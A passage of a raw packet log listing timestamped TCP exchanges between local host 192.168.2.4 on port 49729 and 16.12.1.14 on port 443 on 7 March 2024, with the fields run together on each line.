                                        Mar 7, 2024 10:36:10.725910902 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725919008 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725943089 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725980043 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725984097 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726027012 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726042986 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726067066 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726083994 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726097107 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726187944 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726227999 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726254940 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726265907 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726294041 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726330042 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726341009 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726444960 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726491928 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726501942 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726519108 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726558924 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726586103 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726643085 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726736069 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726777077 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726784945 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726804018 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726804018 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726844072 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726881027 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.726903915 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.726998091 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.727021933 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.727032900 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.727057934 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.727065086 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.727096081 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.727108955 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.727134943 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.727169991 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.727180004 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.727233887 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.727760077 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.727813959 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.727834940 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.727845907 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.727874041 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.727910995 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.727921009 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.728517056 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.728678942 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.728697062 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.728761911 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.728765965 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.728787899 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.728816986 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.728837967 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.730082035 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.730139017 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.730168104 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.730179071 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.730220079 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.730254889 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.730264902 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.730326891 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.731194973 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.731241941 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.731271982 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.731285095 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.731328964 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.731348038 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.732367992 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.732389927 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.732448101 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.732459068 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.732495070 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.732511997 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.733628988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.733655930 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.733715057 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.733728886 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.733752966 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.733776093 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.734390974 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.734411001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.734457970 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.734468937 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.734496117 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.734517097 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.735285044 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.735310078 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.735353947 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.735366106 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.735390902 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.735409975 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.736185074 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.736205101 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.736274958 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.736287117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.736352921 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.737407923 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.737426996 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.737487078 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.737498999 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.737524033 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.738640070 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.738656998 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.738666058 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.738677979 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.738703012 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.738744020 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.739741087 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.739761114 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.739809990 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.739820957 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.739845991 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.740078926 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.740648031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.740669012 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.740730047 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.740744114 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.740770102 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.740784883 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.741508961 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.741528988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.741578102 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.741588116 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.741617918 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.741640091 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.742522001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.742552996 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.742595911 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.742607117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.742643118 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.742660046 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.743563890 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.743596077 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.743626118 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.743637085 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.743671894 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.743690968 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.744829893 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.744862080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.744898081 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.744910002 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.744952917 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.744976997 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.746031046 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.746062994 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.746102095 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.746114016 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.746140003 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.746164083 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.747071981 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.747103930 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.747162104 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.747174025 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.747205019 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.747231007 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.747725964 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.747756958 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.747792006 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.747806072 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.747833014 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.747864962 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.748792887 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.748836040 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.748919010 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.748933077 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.749092102 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.749577999 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.749609947 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.749649048 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.749660015 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.749695063 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.749711037 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.750303984 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.750334978 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.750377893 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.750389099 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.750426054 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.750442982 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.751080036 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.751111031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.751142979 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.751157999 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.751194000 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.751220942 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.752027988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.752058983 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.752110004 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.752121925 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.752161026 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.752188921 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.752779961 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.752820969 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.752892017 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.752912998 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.752926111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.752959013 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.753463984 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.753500938 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.753550053 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.753559113 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.753582001 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.753611088 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.754160881 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.754196882 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.754242897 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.754249096 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.754278898 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.754297018 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.754992962 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.755029917 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.755125046 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.755131960 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.755141973 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.755187035 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.755784988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.755822897 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.755875111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.755883932 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.755896091 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.755922079 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.756520033 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.756556988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.756598949 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.756604910 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.756634951 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.756717920 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.757164001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.757201910 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.757247925 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.757253885 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.757270098 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.757319927 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.757798910 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.757839918 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.757873058 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.757878065 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.757904053 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.757915020 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.758547068 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.758584976 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.758609056 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.758615017 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.758641958 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.758658886 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.759262085 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.759299994 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.759330034 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.759335995 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.759360075 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.759377956 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.760020018 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.760067940 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.760094881 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.760101080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.760134935 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.760148048 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.760521889 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.760560989 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.760597944 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.760605097 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.760629892 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.760648966 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.761266947 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.761307955 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.761341095 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.761347055 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.761373043 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.761390924 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.762015104 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.762056112 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.762079000 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.762084961 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.762104034 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.762120008 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.762761116 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.762782097 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.762820959 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.762828112 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.762851954 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.762862921 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.763498068 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.763518095 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.763556004 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.763564110 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.763581038 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.763596058 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.764349937 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.764369965 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.764405012 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.764411926 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.764434099 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.764451027 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.765163898 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.765186071 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.765224934 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.765230894 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.765254974 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.765266895 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.765889883 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.765908957 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.765945911 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.765954018 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.765976906 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.765995979 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.766719103 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.766737938 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.766772985 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.766782045 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.766798019 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.766817093 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.767473936 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.767494917 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.767529964 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.767535925 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.767560005 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.767570972 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.768229961 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.768250942 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.768285036 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.768291950 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.768310070 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.768321991 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.769011021 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.769032001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.769061089 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.769067049 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.769092083 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.769099951 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.769891977 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.769912004 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.769952059 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.769959927 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.769985914 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.769996881 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.770703077 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.770725012 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.770761013 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.770766973 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.770785093 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.770804882 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.771583080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.771610022 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.771646976 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.771655083 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.771672964 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.771692038 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.772403002 CET4434972916.12.1.14192.168.2.4
